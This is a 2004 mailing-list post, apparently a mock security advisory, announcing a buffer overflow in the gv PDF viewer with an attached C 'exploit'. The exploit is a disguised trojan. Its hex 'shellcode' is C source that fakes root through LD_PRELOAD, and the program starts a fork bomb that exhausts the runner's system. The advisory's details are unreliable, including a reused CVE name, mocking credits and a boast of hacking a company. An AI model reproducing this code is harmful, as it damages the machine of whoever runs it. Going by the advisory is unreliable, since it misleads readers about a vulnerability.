[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200408041146.i74BkCCH090487@mailserver3.hushmail.com>
From: infohacking at hush.com (Hugo Vazquez Carapez )
Subject: IFH-ADV-31339 Exploitable Buffer Overflow in gv
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
zen-parse ZP! told me that he discovered this vulnerability first...
Infohacking was missinformated... so we apologyze this mistake
Anyways you can still enjoy with my leet exploit
On Wed, 04 Aug 2004 03:18:53 -0700 Hugo Vazquez Carapez <infohacking@...h.com>
wrote:
>Exploitable Buffer Overflow in gv
>
>
>Infohacking Security Advisory 08.04.04
>www.infohacking.com
>Aug 04, 2004
>
>
>I. BACKGROUND
>
>Infohacking team (me and myself) discovered a new and unreported
>local
>root vulnerability in gv.
>
>
>
>II. DESCRIPTION
>
>The gv program that is shipped on many Unix systems contains a buffer
>overflow which can be exploited by an attacker sending a malformed
>postscript or Adobe pdf file. The attacker would be able to cause
>arbitrary code to run with the privileges of the victim on his Linux
>computer. The gv program is a PDF and postscript viewing program
>for
>Unix which interfaces with the ghostscript interpreter. It is
>maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by
>Johannes Plass. This particular security vulnerability occurs in
>the
>source code where an unsafe sscanf() call is used to interpret
>PostScript and PDF files.
>
>
>
>III. ANALYSIS
>
>In order to perform exploitation, an attacker would have to trick
>a
>user into viewing a malformed PDF or PostScript file from the command
>line. This may be somewhat easier for Unix based email programs
>that
>associate gv with email attachments. Since gv is not normally
>installed setuid root, an attacker would only be able to cause
>arbitrary code to run with the privileges of that user. Other
>programs that utilize derivatives of gv, such as ggv or kghostview,
>>
>may also be vulnerable in similiar ways.
>
>A proof of concept exploit for Red Hat Linux designed by Hugo is
>attached to this message. It packages the overflow and shellcode
>in
>the "%%PageOrder:" section of the PDF.
>
>
>/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
> *
> * INFOHACKING RESEARCH - L337 h4x0r t34M
> *
> * hugo <hugo@...ohacking.com>
>*/
>
>#include <stdio.h>
>#include <stdlib.h>
>#include <unistd.h>
>
>char hellc0de[] = "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
> "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
> "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
> "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
> "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
> "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
> "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";
>
>int main()
>{
> FILE *fp;
> char *offset;
> fp=fopen("/tmp/own.c","w");
> fprintf(fp,"%s",hellc0de);
> fclose(fp);
>
> system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c");
> if (fork() == 0) {
> sleep(10); while (1) { fork(); offset=malloc(512); }
> exit(0);
> }
> system("LD_PRELOAD=/tmp/own.so /bin/sh");
> return 0;
>}
>/* -EOF- */
>
>
>IV. DETECTION
>
>
>This vulnerability affects the latest version of gv,. An
>exploit has been tested on Red Hat Linux 9 and fedora core 1
>
>
>
>V. WORKAROUNDS
>
>
>To avoid potential exploitation, users can select alternatives to
>gv
>such as Kghostview (included with the KDE desktop environment) for
>instance. Additionally, the vulnerability does not seem to be
>exploitable when a file is opened from the gv interface instead
>of
>the command line.
>
>
>
>VI. CVE INFORMATION
>
>
>The Common Vulnerabilities and Exposures project (cve.mitre.org)
>has
>assigned the name CAN-2001-0832 to this issue.
>
>
>VII. DISCLOSURE TIMELINE
>
>
>03/18/04 Hugo notified the bug to abuse@....255.255.255
>04/11/04 Initial vendor notification - no response
>04/30/04 Secondary vendor notification - no response
>05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want
>a
>job)
>08/04/04 Public Disclosure
>
>
>VIII. CREDIT
>
>Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif
>
>
>Get pwned by script kiddies?
>Call us, we can hack you again.
>
>
>IX. LEGAL NOTICES
>
>
>Copyright (c) 2004 INFOHACKING, Inc.
>
>
>Permission is granted for the redistribution of this alert
>electronically. It may not be edited in any way without the express
>written consent of INFOHACKING. If you wish to reprint the whole
>or any
>
>part of this alert in any other medium other than electronically,
> please
>
>email info@...ohacking.com for permission.
>
>
>Disclaimer: Infohacking is pretty whitehat and lame. If you are
>a part
>of the blackhat communitie, please hack and remove us from the net
>
>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkEQzOQACgkQPMMEGI9aoafEWwCgtFnVpywRuICNcn0JvrNCQ1rZ0QIA
n2xe5aH3fb85WCuDwwOhVO+RGbVs
=4XWm
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
Powered by blists - more mailing lists